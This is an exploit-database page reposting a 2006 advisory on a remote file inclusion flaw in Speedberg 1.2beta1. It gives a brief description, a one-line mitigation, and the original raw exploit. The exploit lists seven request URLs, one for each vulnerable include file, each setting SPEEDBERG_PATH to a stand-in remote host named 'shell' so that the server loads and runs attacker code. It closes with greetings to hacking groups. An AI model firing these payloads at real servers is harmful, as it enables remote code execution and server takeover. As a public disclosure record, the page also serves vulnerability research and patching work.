speedberg - exploit.company

vendor:

Speedberg

by:

k1tk4t

9,3

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Speedberg

Affected Version From: 1.2beta1

Affected Version To: 1.2beta1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

speedberg <= 1.2beta1 Remote File Inclusion

Speedberg version 1.2beta1 is vulnerable to a Remote File Inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, containing arbitrary code which is then executed on the vulnerable server. This vulnerability is due to the application not properly sanitizing user-supplied input to the 'SPEEDBERG_PATH' parameter in multiple files.

Mitigation:

Input validation should be used to prevent the inclusion of remote files. All input data should be validated and filtered, and all output data should be sanitized.

Source

Exploit-DB raw data:

########################################################################
# speedberg <= 1.2beta1  Remote File Inclusion
# Download Source :
http://www.myepfl.ch/speedberg/files/speedberg-1.2beta1.zip
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
file;
entrancePage.tpl.php
generalToolBox.tlb.php
myToolBox.tlb.php
scriplet.inc.php
simplePage.tpl.php
speedberg.class.php
standardPage.tpl.php
########################################################################
exploit;
http://localhost/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=http://shell
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]

# milw0rm.com [2006-10-22]